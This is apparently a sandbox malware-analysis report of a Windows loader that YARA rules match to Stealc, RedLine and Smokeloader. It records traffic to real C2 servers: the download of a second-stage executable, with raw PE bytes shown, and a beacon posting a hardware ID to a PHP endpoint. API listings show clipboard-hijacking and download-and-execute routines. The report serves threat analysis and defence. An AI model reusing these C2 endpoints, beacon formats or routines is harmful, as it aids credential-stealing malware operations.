Oct 26, 2024 08:56:10.255773067 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.255783081 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255798101 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255814075 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255815983 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.255842924 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.255852938 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.256216049 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.256257057 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.256272078 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.256283045 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.256295919 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.256305933 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.295437098 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.295566082 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.295593977 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.295610905 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.295636892 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.295654058 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.340759039 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.340773106 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.340789080 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.340805054 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.340847015 CEST  49705  80     192.168.2.5     176.113.115.37
                                                Oct 26, 2024 08:56:10.340883017 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.371784925 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.371854067 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.371994019 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372046947 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372050047 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372087955 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372391939 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372436047 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372735023 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372783899 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372869015 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372911930 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374619007 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374634981 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374650002 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374661922 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374682903 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374788046 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374809027 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374821901 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374825001 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374840975 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374846935 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374856949 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374862909 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374872923 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374880075 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374888897 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374902964 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374906063 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374913931 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374921083 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374933958 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374938011 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374948025 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374953032 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374959946 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374969959 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374980927 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374994993 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.375021935 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.413808107 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.413831949 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.413871050 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.413907051 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:14.037385941 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:14.037538052 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:16.147942066 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:16.153439045 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:16.153513908 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:16.153630972 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:16.158996105 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:17.037724972 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:17.037800074 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:17.041209936 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:17.046596050 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:18.476349115 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:18.476435900 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:23.501646996 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:23.503283024 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:41.408124924 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:57:55.267123938 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:55.579535961 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:56.189398050 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:57.391952038 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:59.798618078 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:58:04.611038923 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:58:14.220168114 CEST4970580192.168.2.5176.113.115.37
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Oct 26, 2024 08:56:05.330073118 CEST  52272  53  192.168.2.5  1.1.1.1
Oct 26, 2024 08:56:05.419678926 CEST  53  52272  1.1.1.1  192.168.2.5
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Oct 26, 2024 08:56:05.330073118 CEST  192.168.2.5  1.1.1.1  0x64c0  Standard query (0)  post-to-me.com  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Oct 26, 2024 08:56:05.419678926 CEST  1.1.1.1  192.168.2.5  0x64c0  No error (0)  post-to-me.com  (none)  104.21.56.70  A (IP address)  IN (0x0001)  false
Oct 26, 2024 08:56:05.419678926 CEST  1.1.1.1  192.168.2.5  0x64c0  No error (0)  post-to-me.com  (none)  172.67.179.207  A (IP address)  IN (0x0001)  false
                                                • post-to-me.com
                                                • 176.113.115.37
                                                • 62.204.41.177
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.5  49705  176.113.115.37  80  4672  C:\Users\user\Desktop\mCe4hBfqCT.exe
Timestamp  Bytes transferred  Direction  Data
Oct 26, 2024 08:56:07.607604027 CEST  85  OUT  GET /ScreenUpdateSync.exe HTTP/1.1
User-Agent: ShareScreen
Host: 176.113.115.37
Oct 26, 2024 08:56:08.479167938 CEST  1236  IN  HTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:08 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Last-Modified: Sat, 26 Oct 2024 06:45:02 GMT
                                                ETag: "56000-6255b9332d227"
                                                Accept-Ranges: bytes
                                                Content-Length: 352256
                                                Content-Type: application/x-msdos-program
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 56 c7 b3 bd 37 a9 e0 bd 37 a9 e0 bd 37 a9 e0 00 78 3f e0 bc 37 a9 e0 a3 65 2d e0 a1 37 a9 e0 a3 65 3c e0 ac 37 a9 e0 a3 65 2a e0 e0 37 a9 e0 9a f1 d2 e0 b8 37 a9 e0 bd 37 a8 e0 c4 37 a9 e0 a3 65 23 e0 bc 37 a9 e0 a3 65 3d e0 bc 37 a9 e0 a3 65 38 e0 bc 37 a9 e0 52 69 63 68 bd 37 a9 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 12 12 b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 70 03 00 00 44 72 02 00 00 00 00 1f 17 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 75 02 00 04 00 00 4d bf 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$V777x?7e-7e<7e*7777e#7e=7e87Rich7PELepDr@uM< t8{.textpop `.rdataP"$t@@.data|p@.nuhiDs8@.rsrc8{ t|@@
Oct 26, 2024 08:56:08.479228020 CEST  1236  IN  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 b0 43 00 75 02 f3 c3 e9 1a 07 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 91 08 00 00 8b
                                                Data Ascii: ;CuUQeVEPuuu9Et5t,M^UEVFuc@FHlHhN;CtCHpuF;CtFCHpuOFF@puHpF@
Oct 26, 2024 08:56:08.479265928 CEST  1236  IN  Data Raw: 40 50 ff 75 fc e8 44 2d 00 00 59 59 85 c0 74 31 c1 fb 02 50 8d 34 98 e8 18 0f 00 00 59 a3 48 c0 b3 02 ff 75 08 e8 0a 0f 00 00 89 06 83 c6 04 56 e8 ff 0e 00 00 59 a3 44 c0 b3 02 8b 45 08 59 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 56 6a 04 6a 20 e8 ae 2c
                                                Data Ascii: @PuD-YYt1P4YHuVYDEY3_^[Vjj ,VHDujX^&3^jhCg""%euYEEE"%UuYH]U=pCu)ua'h$YY
Oct 26, 2024 08:56:08.479298115 CEST  1236  IN  Data Raw: 3b df 75 4c 39 3d 98 cb 43 00 74 33 56 e8 55 25 00 00 59 85 c0 0f 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 0a 12 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3
                                                Data Ascii: ;uL9=Ct3VU%YrE;PE3ujY;uE;t-t"ttHt3VWh3FWP23~~~~CF+@Ou@Nu_^U
Oct 26, 2024 08:56:08.479358912 CEST  1236  IN  Data Raw: 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 67 fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 b4 b5 43 00 5a 66 8b 31 41 66 89 30 41 40 40 4a 75 f3 8b f3 e8 d7 fb ff ff e9 b7 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 46 46 80
                                                Data Ascii: }ur{CgjCCCZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95CXM_^3[jhCM}_huuE;CWh &"Y
Oct 26, 2024 08:56:08.479394913 CEST  1236  IN  Data Raw: c7 5f 5d c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 c1 fe ff ff 59 85 f6 74 1b 56 e8 45 ff ff ff 83 3e 00 59 75 0f 81 fe b0 b6 43 00 74 07 56 e8 59 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68 b8 95 43 00 e8 22 14 00 00 e8 2c 03 00
                                                Data Ascii: _]t7t3V0;t(W8YtVE>YuCtVYY^3jhC",CFpt"~ltpluj LY5jYeFl=CiEEjYuUV5C5Ct!CtP5Ct'
Oct 26, 2024 08:56:08.479429960 CEST  1236  IN  Data Raw: 34 80 43 00 85 c0 75 07 56 e8 b2 11 00 00 59 8b f8 85 ff 0f 84 5e 01 00 00 8b 35 80 80 43 00 68 dc 82 43 00 57 ff d6 68 d0 82 43 00 57 a3 dc c6 43 00 ff d6 68 c4 82 43 00 57 a3 e0 c6 43 00 ff d6 68 bc 82 43 00 57 a3 e4 c6 43 00 ff d6 83 3d dc c6
                                                Data Ascii: 4CuVY^5ChCWhCWChCWChCWC=C5CCt=Ct=Ctu$CCCC$@5CCCC5CP5C5CC5CC5
Oct 26, 2024 08:56:08.479460955 CEST  36  IN  Data Raw: 00 5e 5d c3 8b ff 55 8b ec 8b 0d 60 c0 b3 02 a1 64 c0 b3 02 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00
                                                Data Ascii: ^]U`dkU+P
Oct 26, 2024 08:56:08.479495049 CEST  1236  IN  Data Raw: 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b cf 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f0 8b 0e 49 89 4d fc f6 c1 01 0f 85 d3 02 00 00 53 8d 1c
                                                Data Ascii: r;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]
Oct 26, 2024 08:56:08.479531050 CEST  1236  IN  Data Raw: 21 50 08 8b c3 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56 8b 75 10 57 8b 7d 0c 8b d7 2b 51 0c 83 c6 17 c1 ea 0f 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4f fc 83 e6 f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d
                                                Data Ascii: !P_^[UMASVuW}+QiDMOI;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}
Oct 26, 2024 08:56:08.485047102 CEST  1236  IN  Data Raw: 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08 0f 84 8d 00 00 00 8b 4d f4 8d 0c f1 8b 79 04 89 4a 08 89 7a 04 89 51 04 8b 4a 04 89 51 08 8b 4a 04 3b 4a 08 75 5e 8a 4c 06 04 88 4d 0b fe c1
                                                Data Ascii: ]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuNL2uy>u;@CuM;tu%@CM


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.5  49706  62.204.41.177  80  5576  C:\Users\user\AppData\Local\Temp\64A.tmp.exe
Timestamp  Bytes transferred  Direction  Data
Oct 26, 2024 08:56:16.153630972 CEST  88  OUT  GET / HTTP/1.1
Host: 62.204.41.177
Connection: Keep-Alive
Cache-Control: no-cache
Oct 26, 2024 08:56:17.037724972 CEST  203  IN  HTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:16 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 0
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
Oct 26, 2024 08:56:17.041209936 CEST  418  OUT  POST /edd20096ecef326d.php HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBG
                                                Host: 62.204.41.177
                                                Content-Length: 218
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 42 45 43 44 45 31 32 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a
                                                Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"0EFBECDE1239786254513------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default9_cap------ECGDHDHJEBGHJKFIECBG--
Oct 26, 2024 08:56:18.476349115 CEST  210  IN  HTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:17 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 8
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                Data Ascii: YmxvY2s=


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.5  49704  104.21.56.70  443  4672  C:\Users\user\Desktop\mCe4hBfqCT.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-26 06:56:06 UTC  90  OUT  GET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                User-Agent: ShareScreen
                                                Host: post-to-me.com
2024-10-26 06:56:07 UTC  778  IN  HTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5oQOIcvye9ej8UbhqAMUqoJN3KnFm9ZMI2VnaVAMDGAwecwPIXLZ0zREyNkJXiO4txr9rirpAYxj%2FrUbA%2Bx6uWL9LfMMcAdyTasnhLaq95UY3hoZaae%2FXirRdAtt%2BvtOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8d888b6c0909e7ff-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1901&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=728&delivery_rate=1553648&cwnd=251&unsent_bytes=0&cid=ce5d352a6f374130&ts=1332&x=0"
2024-10-26 06:56:07 UTC  7  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-26 06:56:07 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 02:56:01
Start date: 26/10/2024
Path: C:\Users\user\Desktop\mCe4hBfqCT.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\mCe4hBfqCT.exe"
Imagebase: 0x400000
File size: 430'592 bytes
MD5 hash: 5B01B239F2B48841380E3665D1C3F98A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 2
Start time: 02:56:10
Start date: 26/10/2024
Path: C:\Users\user\AppData\Local\Temp\64A.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\64A.tmp.exe"
Imagebase: 0x400000
File size: 352'256 bytes
MD5 hash: 676EE4608A4ABD53EBDD6B380C2A3817
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 45%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 6
Start time: 02:56:18
Start date: 26/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044
Imagebase: 0x260000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 4.4%
Signature Coverage: 6.7%
Total number of Nodes: 638
Total number of Limit Nodes: 20
                                                  execution_graph: rendered graph of function nodes (addresses in the 0x401000-0x43ffff, 0x2d29000 and 0x3010000 regions) with API-call edges (clipboard, WinINet, file, registry, thread, heap and exception-handling APIs); the serialized node/edge data is not reproduced here.

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                  • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                    • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                  • OpenClipboard.USER32(00000000), ref: 00401721
                                                  • GetClipboardData.USER32(00000001), ref: 00401731
                                                  • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                  • _strlen.LIBCMT ref: 0040174D
                                                  • _strlen.LIBCMT ref: 0040177C
                                                  • _strlen.LIBCMT ref: 004018C0
                                                  • EmptyClipboard.USER32 ref: 004018D6
                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                  • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                  • CloseClipboard.USER32 ref: 00401941
                                                  • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                  • String ID: i
                                                  • API String ID: 1583243082-3865851505
                                                  • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                  • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                  • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                  • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D

                                                  Control-flow Graph

                                                  APIs
                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                  • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                  • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                  • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                  • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                  • String ID: .exe$<$ShareScreen
                                                  • API String ID: 3323492106-493228180
                                                  • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                  • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                  • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                  • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D2A296
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02D2A2B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D29000, based on PE: false
                                                  Joe Sandbox IDA Plugin
